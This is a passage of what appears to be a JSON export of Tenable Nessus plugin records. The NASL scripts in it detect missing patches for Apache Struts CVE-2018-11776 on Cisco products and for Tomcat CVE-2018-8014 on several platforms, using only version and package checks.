script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:10", "description": "An update of 'apache-tomcat' packages of Photon OS has been released.", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Apache PHSA-2018-2.0-0065 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:apache", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0065.NASL", "href": "https://www.tenable.com/plugins/nessus/111952", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0065. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111952);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:51\");\n\n script_cve_id(\"CVE-2018-8014\");\n\n script_name(english:\"Photon OS 2.0: Apache PHSA-2018-2.0-0065 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'apache-tomcat' packages of Photon OS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-65\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93f4e21b\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"apache-tomcat-8.5.31-3.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:40:49", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED 97aa159b84dc044b30c1959493ad4c2ef0b54f85d3e848f88bee9278a7ddad8a181a74909f1d0d76ce1b6789d6c52e06d8149ee1cd6b40ddc4809e01f93833be8020dacc4dd4a97c9adce91fde281659f57715154563c57a7067c369b7d014b2a20c63c0692370955493497ee5cc676ed67b7252f230321c84a756e4f7c6d300d603cb3a8441874a6b4a31d3e38b204cdfedfac2e159a1a6050a4e54e7e7d3a571f78bedb4ce38b25be27cfd186ec5a6d7ecb38bfcfc47307d6e8f2129c339cc2a40a9c1c376b220a07abb868589c8dd6bda1077121b2eaf32b235e36d05a0421ed24805286671b039794ad9999fff2a8ceea76e4cc2f7cf8611fd9b28ec473949aba55b3f4a0cfd91455716d0733c829031593c83528f5d8fbcb05351beaad63c70c1095d11b5d38e04cba7fd3800c21beb5e6382e20a3ccb6d00ac98d43d6ea3f1ff6566edeb9f0e8d98068cf9d6c881c0642ffda92b77e30b7b7ddf74136dca18b0813568c2f591018a81531bae509d7df421eef82e4d4fba2ffd1b76b3a561e1018e2630dac16d14f05b6342fb8c08ca13b94882eb818ba59f9f11fce385b9a3bf4dd7f0524b9d50096716733342ac10b83b1e52ba609ba841786810a1c88816deeb90ef81ff652cb02d46c1babdec6c8b9d00657c051ee857779d7fd75b624224079533e69b4308b4ee87d8a1cc79d022715df20de81e55f351e7a543e7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' : '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:42:56", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED 531d8e919a578f5c402d55046279c6aa0319d64b11e6cfd1d400748c61e7c7ccaa711a8f2191f3390f64108dffec9cda1cfe6622e5965ce8740b74f709d83c9d97499c02c97b3848ad634219e609ff7acf98126943660349b42695aa34d768104c488c436c13e7667ce892766c7d106e37048ddcfba1ac2b772443e7a905b1e8a682e45817ad69bc684a2bce250dff79993839689a846ddc0e06ab184bbfc3958301fba47c2702e4bcc930e1eb90226c73a1a769e5c70c5b10a8341dac93b861d607f4713d05ce8f97544352f71f3a88dc9c2786a8e8747ac50f485c2b647276a41f88bb7c7cd340c7e3af67cd61a049cca011e3d9942ca32f0319c5fec33e651fb67d3d5f6f7859ea8414f333e21cac76fa1b4d3547ce78f376a0411eb50ef2dcbc163acce202bce2ef787f11028a173ada909c2b9bd82caddf4bb845e8159b4e4fb812ad4e8e6e24fad03496b0ac669c65e83433510c8b2b7915fa57f2f1f21d5866de373bf1fa4ecf5d5a50820a8f105b1744bd5693eda065b42bbb5486f28a0d2a94e6aa24fb12daafc9bf238b9c0add4691b0cbe3fe731b48a92d99ad9d4ffa22d31da79c776337c955cf2d58045aecf66c7250e7e147e1c6c36943213d6eea7c6c09437c8ec741e07e289ae48a2ec13c44a4b8ccf0d1b9824180479f8e787bdd465aa0346c61b3dcb6fe34ee45d7327e52b9c09a0dc5a05e7f4ed13b56\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:44", "description": "According to the version of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration.\n Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2018-1227)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1227.NASL", "href": "https://www.tenable.com/plugins/nessus/111647", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-8014\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2018-1227)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1227\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c1b3c28\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-3.h1\",\n \"tomcat-admin-webapps-7.0.76-3.h1\",\n \"tomcat-el-2.2-api-7.0.76-3.h1\",\n \"tomcat-jsp-2.2-api-7.0.76-3.h1\",\n \"tomcat-lib-7.0.76-3.h1\",\n \"tomcat-servlet-3.0-api-7.0.76-3.h1\",\n \"tomcat-webapps-7.0.76-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:42", "description": "The version of Apache Tomcat installed on the remote host is 8.0.x prior to 8.0.53. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-07-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.0.0 < 8.0.53 Security Constraint Weakness", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_53.NASL", "href": "https://www.tenable.com/plugins/nessus/111067", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111067);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\");\n script_bugtraq_id(104203);\n\n script_name(english:\"Apache Tomcat 8.0.0 < 8.0.53 Security Constraint Weakness\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.0.x\nprior to 8.0.53. It is, therefore, affected by multiple \nvulnerabilities.\");\n # http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.53\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cea2044a\");\n # https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5ab19d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.0.53 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 